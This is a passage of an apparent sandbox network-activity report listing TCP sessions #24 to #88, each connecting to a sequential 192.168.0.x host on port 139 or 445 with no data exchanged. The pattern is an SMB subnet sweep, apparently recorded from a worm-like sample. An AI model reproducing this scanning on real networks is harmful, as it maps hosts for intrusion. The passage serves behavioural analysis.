Remote Address	192.168.0.11
Remote Port	139
Local Address	0.0.0.0
Local Port	49181
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.11, remote_port = 139		1	Fn

TCP Session #24

Information	Value
Handle	0x3d8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.11
Remote Port	445
Local Address	0.0.0.0
Local Port	49182
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.11, remote_port = 445		1	Fn

TCP Session #25

Information	Value
Handle	0x3b8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.12
Remote Port	445
Local Address	0.0.0.0
Local Port	49183
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.12, remote_port = 445		1	Fn

TCP Session #26

Information	Value
Handle	0x3bc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.12
Remote Port	139
Local Address	0.0.0.0
Local Port	49184
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.12, remote_port = 139		1	Fn

TCP Session #27

Information	Value
Handle	0x3e4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.13
Remote Port	139
Local Address	0.0.0.0
Local Port	49185
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.13, remote_port = 139		1	Fn

TCP Session #28

Information	Value
Handle	0x3e8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.13
Remote Port	445
Local Address	0.0.0.0
Local Port	49186
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.13, remote_port = 445		1	Fn

TCP Session #29

Information	Value
Handle	0x3ec
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.14
Remote Port	445
Local Address	0.0.0.0
Local Port	49187
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.14, remote_port = 445		1	Fn

TCP Session #30

Information	Value
Handle	0x3f0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.14
Remote Port	139
Local Address	0.0.0.0
Local Port	49188
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.14, remote_port = 139		1	Fn

TCP Session #31

Information	Value
Handle	0x3f4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.15
Remote Port	139
Local Address	0.0.0.0
Local Port	49189
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.15, remote_port = 139		1	Fn

TCP Session #32

Information	Value
Handle	0x3fc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.16
Remote Port	445
Local Address	0.0.0.0
Local Port	49191
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.16, remote_port = 445		1	Fn

TCP Session #33

Information	Value
Handle	0x404
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.16
Remote Port	139
Local Address	0.0.0.0
Local Port	49192
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.16, remote_port = 139		1	Fn

TCP Session #34

Information	Value
Handle	0x3e0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.17
Remote Port	139
Local Address	0.0.0.0
Local Port	49193
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.17, remote_port = 139		1	Fn

TCP Session #35

Information	Value
Handle	0x408
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.17
Remote Port	445
Local Address	0.0.0.0
Local Port	49194
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.17, remote_port = 445		1	Fn

TCP Session #36

Information	Value
Handle	0x414
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.18
Remote Port	445
Local Address	0.0.0.0
Local Port	49195
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.18, remote_port = 445		1	Fn

TCP Session #37

Information	Value
Handle	0x418
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.18
Remote Port	139
Local Address	0.0.0.0
Local Port	49196
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.18, remote_port = 139		1	Fn

TCP Session #38

Information	Value
Handle	0x41c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.19
Remote Port	139
Local Address	0.0.0.0
Local Port	49197
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.19, remote_port = 139		1	Fn

TCP Session #39

Information	Value
Handle	0x420
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.19
Remote Port	445
Local Address	0.0.0.0
Local Port	49198
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.19, remote_port = 445		1	Fn

TCP Session #40

Information	Value
Handle	0x3dc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.20
Remote Port	445
Local Address	0.0.0.0
Local Port	49199
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.20, remote_port = 445		1	Fn

TCP Session #41

Information	Value
Handle	0x410
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.20
Remote Port	139
Local Address	0.0.0.0
Local Port	49200
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.20, remote_port = 139		1	Fn

TCP Session #42

Information	Value
Handle	0x430
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.21
Remote Port	139
Local Address	0.0.0.0
Local Port	49201
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.21, remote_port = 139		1	Fn

TCP Session #43

Information	Value
Handle	0x434
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.21
Remote Port	445
Local Address	0.0.0.0
Local Port	49202
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.21, remote_port = 445		1	Fn

TCP Session #44

Information	Value
Handle	0x424
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.22
Remote Port	445
Local Address	0.0.0.0
Local Port	49203
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.22, remote_port = 445		1	Fn

TCP Session #45

Information	Value
Handle	0x428
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.22
Remote Port	139
Local Address	0.0.0.0
Local Port	49204
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.22, remote_port = 139		1	Fn

TCP Session #46

Information	Value
Handle	0x440
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.23
Remote Port	445
Local Address	0.0.0.0
Local Port	49205
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.23, remote_port = 445		1	Fn

TCP Session #47

Information	Value
Handle	0x444
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.23
Remote Port	139
Local Address	0.0.0.0
Local Port	49206
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.23, remote_port = 139		1	Fn

TCP Session #48

Information	Value
Handle	0x448
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.24
Remote Port	139
Local Address	0.0.0.0
Local Port	49207
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.24, remote_port = 139		1	Fn

TCP Session #49

Information	Value
Handle	0x44c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.24
Remote Port	445
Local Address	0.0.0.0
Local Port	49208
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.24, remote_port = 445		1	Fn

TCP Session #50

Information	Value
Handle	0x438
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.25
Remote Port	445
Local Address	0.0.0.0
Local Port	49209
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.25, remote_port = 445		1	Fn

TCP Session #51

Information	Value
Handle	0x43c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.25
Remote Port	139
Local Address	0.0.0.0
Local Port	49210
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.25, remote_port = 139		1	Fn

TCP Session #52

Information	Value
Handle	0x450
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.26
Remote Port	139
Local Address	0.0.0.0
Local Port	49211
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.26, remote_port = 139		1	Fn

TCP Session #53

Information	Value
Handle	0x458
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.26
Remote Port	445
Local Address	0.0.0.0
Local Port	49212
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.26, remote_port = 445		1	Fn

TCP Session #54

Information	Value
Handle	0x460
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.27
Remote Port	445
Local Address	0.0.0.0
Local Port	49213
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.27, remote_port = 445		1	Fn

TCP Session #55

Information	Value
Handle	0x464
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.27
Remote Port	139
Local Address	0.0.0.0
Local Port	49214
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.27, remote_port = 139		1	Fn

TCP Session #56

Information	Value
Handle	0x108
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.28
Remote Port	139
Local Address	0.0.0.0
Local Port	49215
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.28, remote_port = 139		1	Fn

TCP Session #57

Information	Value
Handle	0x130
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.28
Remote Port	445
Local Address	0.0.0.0
Local Port	49216
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.28, remote_port = 445		1	Fn

TCP Session #58

Information	Value
Handle	0x254
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.29
Remote Port	445
Local Address	0.0.0.0
Local Port	49217
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.29, remote_port = 445		1	Fn

TCP Session #59

Information	Value
Handle	0x468
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.29
Remote Port	139
Local Address	0.0.0.0
Local Port	49218
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.29, remote_port = 139		1	Fn

TCP Session #60

Information	Value
Handle	0x46c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.30
Remote Port	139
Local Address	0.0.0.0
Local Port	49219
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.30, remote_port = 139		1	Fn

TCP Session #61

Information	Value
Handle	0x470
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.30
Remote Port	445
Local Address	0.0.0.0
Local Port	49220
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.30, remote_port = 445		1	Fn

TCP Session #62

Information	Value
Handle	0x474
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.31
Remote Port	445
Local Address	0.0.0.0
Local Port	49221
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.31, remote_port = 445		1	Fn

TCP Session #63

Information	Value
Handle	0x478
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.31
Remote Port	139
Local Address	0.0.0.0
Local Port	49222
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.31, remote_port = 139		1	Fn

TCP Session #64

Information	Value
Handle	0x47c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.32
Remote Port	139
Local Address	0.0.0.0
Local Port	49223
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.32, remote_port = 139		1	Fn

TCP Session #65

Information	Value
Handle	0x480
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.32
Remote Port	445
Local Address	0.0.0.0
Local Port	49224
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.32, remote_port = 445		1	Fn

TCP Session #66

Information	Value
Handle	0x484
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.33
Remote Port	445
Local Address	0.0.0.0
Local Port	49225
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.33, remote_port = 445		1	Fn

TCP Session #67

Information	Value
Handle	0x488
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.33
Remote Port	139
Local Address	0.0.0.0
Local Port	49226
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.33, remote_port = 139		1	Fn

TCP Session #68

Information	Value
Handle	0x40c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.34
Remote Port	445
Local Address	0.0.0.0
Local Port	49227
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.34, remote_port = 445		1	Fn

TCP Session #69

Information	Value
Handle	0x454
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.34
Remote Port	139
Local Address	0.0.0.0
Local Port	49228
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.34, remote_port = 139		1	Fn

TCP Session #70

Information	Value
Handle	0x490
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.35
Remote Port	445
Local Address	0.0.0.0
Local Port	49230
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.35, remote_port = 445		1	Fn

TCP Session #71

Information	Value
Handle	0x45c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.36
Remote Port	139
Local Address	0.0.0.0
Local Port	49231
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.36, remote_port = 139		1	Fn

TCP Session #72

Information	Value
Handle	0x42c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.36
Remote Port	445
Local Address	0.0.0.0
Local Port	49232
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.36, remote_port = 445		1	Fn

TCP Session #73

Information	Value
Handle	0x49c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.37
Remote Port	445
Local Address	0.0.0.0
Local Port	49233
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.37, remote_port = 445		1	Fn

TCP Session #74

Information	Value
Handle	0x4a0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.37
Remote Port	139
Local Address	0.0.0.0
Local Port	49234
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.37, remote_port = 139		1	Fn

TCP Session #75

Information	Value
Handle	0x4a4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.38
Remote Port	139
Local Address	0.0.0.0
Local Port	49235
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.38, remote_port = 139		1	Fn

TCP Session #76

Information	Value
Handle	0x498
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.38
Remote Port	445
Local Address	0.0.0.0
Local Port	49236
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.38, remote_port = 445		1	Fn

TCP Session #77

Information	Value
Handle	0x4b0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.39
Remote Port	445
Local Address	0.0.0.0
Local Port	49237
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.39, remote_port = 445		1	Fn

TCP Session #78

Information	Value
Handle	0x4b8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.40
Remote Port	445
Local Address	0.0.0.0
Local Port	49238
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.40, remote_port = 445		1	Fn

TCP Session #79

Information	Value
Handle	0x4bc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.39
Remote Port	139
Local Address	0.0.0.0
Local Port	49239
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.39, remote_port = 139		1	Fn

TCP Session #80

Information	Value
Handle	0x4c4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.40
Remote Port	139
Local Address	0.0.0.0
Local Port	49240
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.40, remote_port = 139		1	Fn

TCP Session #81

Information	Value
Handle	0x4d4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.41
Remote Port	139
Local Address	0.0.0.0
Local Port	49241
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.41, remote_port = 139		1	Fn

TCP Session #82

Information	Value
Handle	0x4d8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.41
Remote Port	445
Local Address	0.0.0.0
Local Port	49242
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.41, remote_port = 445		1	Fn

TCP Session #83

Information	Value
Handle	0x4d0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.42
Remote Port	445
Local Address	0.0.0.0
Local Port	49243
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.42, remote_port = 445		1	Fn

TCP Session #84

Information	Value
Handle	0x4dc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.42
Remote Port	139
Local Address	0.0.0.0
Local Port	49244
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.42, remote_port = 139		1	Fn

TCP Session #85

Information	Value
Handle	0x4cc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.43
Remote Port	139
Local Address	0.0.0.0
Local Port	49245
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.43, remote_port = 139		1	Fn

TCP Session #86

Information	Value
Handle	0x4e0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.43
Remote Port	445
Local Address	0.0.0.0
Local Port	49246
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.43, remote_port = 445		1	Fn

TCP Session #87

Information	Value
Handle	0x4ec
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.44
Remote Port	445
Local Address	0.0.0.0
Local Port	49247
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.44, remote_port = 445		1	Fn

TCP Session #88

Information	Value
Handle	0x4f0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.44
Remote Port	139
Local Address	0.0.0.0
Local Port	49248
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.44, remote_port = 139		1	Fn

TCP Session #89

Information	Value
